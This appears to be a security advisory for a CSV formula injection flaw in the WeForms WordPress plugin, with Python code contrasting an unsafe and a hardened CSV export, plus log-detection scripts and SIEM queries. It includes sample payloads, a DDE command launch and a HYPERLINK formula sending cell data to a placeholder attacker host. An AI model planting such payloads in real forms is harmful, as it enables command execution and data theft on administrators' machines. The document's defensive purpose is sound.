CVE-2020-22276

9.8 CRITICAL

📋 TL;DR

CVE-2020-22276 is a CSV injection (formula injection) vulnerability in the WeForms WordPress plugin, version 1.4.7. Values submitted through a public form are written verbatim into the CSV produced by the plugin's entry export. When an administrator opens that export in a spreadsheet application, any cell that begins with =, +, -, @ (or a tab or carriage return) is parsed as a formula instead of text; depending on the application and its settings, such a formula can launch a local command (for example through DDE in Excel) or leak cell contents to a remote server (for example through HYPERLINK). The WordPress site itself is not compromised; the target is the workstation of whoever opens the file.
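The following Python script, added here as an illustration and not code from the WeForms plugin, shows the mechanism in miniature: a naive CSV export that writes form entries unchanged (the 1.4.7 behaviour) next to a hardened export that neutralizes formula-leading cells the way the fix and the OWASP CSV injection guidance recommend. The entries, field names and payload strings are constructed sample data; the attacker host name is a placeholder.

```python
import csv
import io

# Characters that make Excel/LibreOffice treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample entries (not real form data). Entries 2 and 3 carry the
# two classic payload shapes: DDE command launch and HYPERLINK-based exfil.
SAMPLE_ENTRIES = [
    {"name": "Alice", "message": "Hello"},
    {"name": "=cmd|' /C calc'!A0", "message": "x"},
    {"name": "Bob", "message": '=HYPERLINK("http://attacker.example/?"&A2,"open")'},
    {"name": "Carol", "message": "-5"},
]
FIELDS = ["name", "message"]


def _is_number(text):
    """True for plain numeric strings such as "-5" or "+3.14"."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def export_unsafe(entries, fields):
    """The vulnerable behaviour in miniature: values go into the CSV unchanged."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields, lineterminator="\n")
    writer.writeheader()
    for entry in entries:
        writer.writerow({f: entry.get(f, "") for f in fields})
    return buf.getvalue()


def neutralize(value):
    """Return value so that a spreadsheet shows it as text, never as a formula.

    Plain numbers are left alone so numeric columns keep sorting correctly;
    anything else that starts with a trigger character gets a leading
    apostrophe, which spreadsheets read as a "this is text" marker.
    """
    text = "" if value is None else str(value)
    if not text or text[0] not in FORMULA_TRIGGERS or _is_number(text):
        return text
    return "'" + text


def export_safe(entries, fields):
    """Hardened export: neutralize every cell and quote every field so a
    payload cannot break out of its cell via embedded commas or quotes."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for entry in entries:
        writer.writerow({f: neutralize(entry.get(f)) for f in fields})
    return buf.getvalue()


def parse_cells(csv_text):
    """Read a CSV back into rows of cells (what the spreadsheet will see)."""
    return list(csv.reader(io.StringIO(csv_text)))


def unsafe_cells(csv_text):
    """Data cells that a spreadsheet would evaluate as formulas."""
    return [cell for row in parse_cells(csv_text)[1:] for cell in row
            if cell and cell[0] in FORMULA_TRIGGERS and not _is_number(cell)]


if __name__ == "__main__":
    print("--- unsafe export ---")
    print(export_unsafe(SAMPLE_ENTRIES, FIELDS))
    print("--- hardened export ---")
    print(export_safe(SAMPLE_ENTRIES, FIELDS))
```

Note the trade-off in `neutralize`: leaving genuine numbers untouched keeps exports usable, but it means a filter based only on the first character is not a complete defence; the apostrophe prefix plus full quoting is what actually stops evaluation. Some tooling prefixes a tab instead of an apostrophe; either works, as long as embedded double quotes are doubled so a payload cannot close the cell early.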

💻 Affected Systems

Products:
  • WeForms WordPress Plugin
Versions: 1.4.7
Operating Systems: Any OS running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Requires the plugin to be installed and active with form entry export functionality accessible.

📦 What is this software?

WeForms is a drag-and-drop form builder plugin for WordPress from weDevs. Submissions are stored in the site database as entries, and administrators can export those entries as a CSV file from the admin panel; that export is where this vulnerability lives.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker gets command execution on an administrator's workstation when the exported CSV is opened with DDE or external links enabled, leading to full compromise of that machine, theft of the credentials it holds, or ransomware deployment.

🟠 Likely Case

The administrator opens the export in Excel or LibreOffice, clicks through the "update links" or "enable" prompt, and the injected formula runs: it launches a command or sends cell contents (including other submitters' data) to an attacker-controlled server.

🟢 If Mitigated

If the export neutralizes cells that begin with a formula trigger, and the spreadsheet is configured to block DDE and external content, the payload is displayed as inert text and the impact is limited to a misleading or malformed cell with no code execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes (the payload is submitted through a public form; the export and open steps are performed by an administrator)
Complexity: LOW

Exploitation requires the attacker to submit malicious form data and an administrator to export the entries and open the CSV in a spreadsheet application. No authentication is needed for the form submission. The 9.8 score assumes no user interaction; in practice the attack only succeeds once the administrator opens the file and accepts the spreadsheet's prompts, so treat the practical severity as lower than the headline score.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.4.8 or later

Vendor Advisory: https://wordpress.org/plugins/weforms/#developers

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the WeForms plugin.
4. Click 'Update Now' if available.
5. Alternatively, download the latest version from the WordPress plugin repository and update manually.

🔧 Temporary Workarounds

Disable CSV export functionality (applies to: all platforms)

Remove or restrict access to the form entry export feature in the WeForms plugin settings until the plugin is updated.

Configure spreadsheet software security (applies to: all platforms)

Block DDE and external content in the applications that will open exports: in Excel this is under Trust Center > External Content; LibreOffice prompts before updating external links, so keep that prompt enabled. Never click through "update links" or "enable content" prompts on an exported file. Google Sheets does not support DDE, but functions that fetch URLs (for example HYPERLINK or IMPORTXML) can still exfiltrate data, so the export-side fix is the real control.

🧯 If You Can't Patch

  • Restrict WeForms plugin access to trusted administrators only, and instruct them to open exported CSVs as text (for example via the spreadsheet's import wizard with formulas disabled) rather than by double-clicking the file
  • Implement web application firewall rules to block CSV injection payloads, accepting that this is a weak control: legitimate values such as negative numbers and international phone numbers start with the same characters, a leading tab or carriage return also triggers formula parsing, and the injection point is a public form the WAF must keep usable

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > Installed Plugins for WeForms version 1.4.7

Check Version:

wp plugin list --name=weforms --field=version

Verify Fix Applied:

Verify WeForms plugin version is 1.4.8 or higher after update

📡 Detection & Monitoring

Log Indicators:

  • Form submissions whose field values begin with a formula trigger character (=, +, -, @, tab, carriage return) and also contain formula syntax such as a function call, a DDE pipe (|) or a bang (!); values that are merely negative numbers or phone numbers will match a naive first-character filter
  • Multiple CSV export requests from a single IP in a short window

Network Indicators:

  • HTTP POST requests to /wp-admin/admin-ajax.php with the weforms_export_entries action (verify the action name against the plugin version you run; the export may instead be served through the plugin's REST routes)

SIEM Query:

source="wordpress.log" action="weforms_export_entries" | stats count by src_ip | where count > 5

source="wordpress.log" event="form_submit" | regex value="^\s*[=+\-@\t\r].*([A-Za-z_]+\(|[|!])"

(Field names such as action, src_ip, event and value are illustrative; adapt them to your log schema. The second query deliberately requires formula syntax after the trigger character so that negative numbers and phone numbers do not alert.)
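The same two indicators as a stand-alone detection script, added here as an example rather than taken from the page or the plugin. It runs over constructed log lines in an assumed key=value format (WeForms' real log format is not documented on this page, so the two regular expressions will need adapting to your source), grades each suspicious submission by whether it contains real formula syntax, and counts export requests per source IP.

```python
import re
from collections import Counter

# Constructed sample log lines in an assumed key=value format (not real
# WeForms output). Adapt SUBMIT_RE and EXPORT_RE to your own log schema.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z ip=203.0.113.5 event=form_submit form_id=3 field="name" value="Alice"
2024-05-01T10:00:02Z ip=203.0.113.5 event=form_submit form_id=3 field="phone" value="+44 20 7946 0000"
2024-05-01T10:00:03Z ip=198.51.100.7 event=form_submit form_id=3 field="name" value="=cmd|' /C calc'!A0"
2024-05-01T10:00:04Z ip=198.51.100.7 event=form_submit form_id=3 field="message" value="  -2+cmd|' /C calc'!A0"
2024-05-01T10:00:05Z ip=198.51.100.7 event=form_submit form_id=3 field="amount" value="-5"
2024-05-01T10:05:00Z ip=192.0.2.9 event=admin_ajax action=weforms_export_entries
2024-05-01T10:05:01Z ip=192.0.2.9 event=admin_ajax action=weforms_export_entries
2024-05-01T10:05:02Z ip=192.0.2.9 event=admin_ajax action=weforms_export_entries
2024-05-01T10:06:00Z ip=203.0.113.5 event=admin_ajax action=weforms_export_entries
"""

SUBMIT_RE = re.compile(r'ip=(\S+) event=form_submit .*?field="([^"]*)" value="(.*)"$')
EXPORT_RE = re.compile(r'ip=(\S+) event=admin_ajax action=weforms_export_entries')

# Characters that make a spreadsheet parse the cell as a formula.
FORMULA_TRIGGERS = "=+-@\t\r"
# What a real payload almost always contains: a function call such as
# HYPERLINK(, the DDE pipe '|', or the '!' separating a DDE topic from its item.
FORMULA_SYNTAX = re.compile(r"[A-Za-z_][A-Za-z0-9_.]*\(|[|!]")


def _is_number(text):
    try:
        float(text)
        return True
    except ValueError:
        return False


def classify_value(value):
    """Return 'high', 'low' or None for one submitted field value.

    'high' means trigger character plus formula syntax; 'low' means only a
    leading trigger character, which is what phone numbers look like too.
    Leading spaces are ignored, leading tabs are not (a tab is itself a trigger).
    """
    text = value.lstrip(" ")
    if not text or text[0] not in FORMULA_TRIGGERS or _is_number(text):
        return None
    return "high" if FORMULA_SYNTAX.search(text) else "low"


def scan_submissions(log_text):
    """Alerts for form submissions carrying formula-shaped values."""
    alerts = []
    for line in log_text.splitlines():
        match = SUBMIT_RE.search(line)
        if not match:
            continue
        ip, field, value = match.groups()
        severity = classify_value(value)
        if severity:
            alerts.append({"ip": ip, "field": field,
                           "value": value, "severity": severity})
    return alerts


def export_bursts(log_text, threshold=3):
    """Source IPs that issued at least `threshold` entry-export requests."""
    counts = Counter(m.group(1)
                     for m in map(EXPORT_RE.search, log_text.splitlines()) if m)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for alert in scan_submissions(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ip']} field={alert['field']!r} value={alert['value']!r}")
    for ip, n in export_bursts(SAMPLE_LOG).items():
        print(f"[export burst] {ip}: {n} export requests")
```

In this sample the phone number is reported as "low" and the negative amount is not reported at all, while both DDE payloads are "high"; that split is the point of the two-tier rule, since an alert on every leading "+" or "-" would be ignored within a day on any real site. The export-burst threshold is arbitrary and should be set from your own baseline of how often administrators export.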

🔗 References
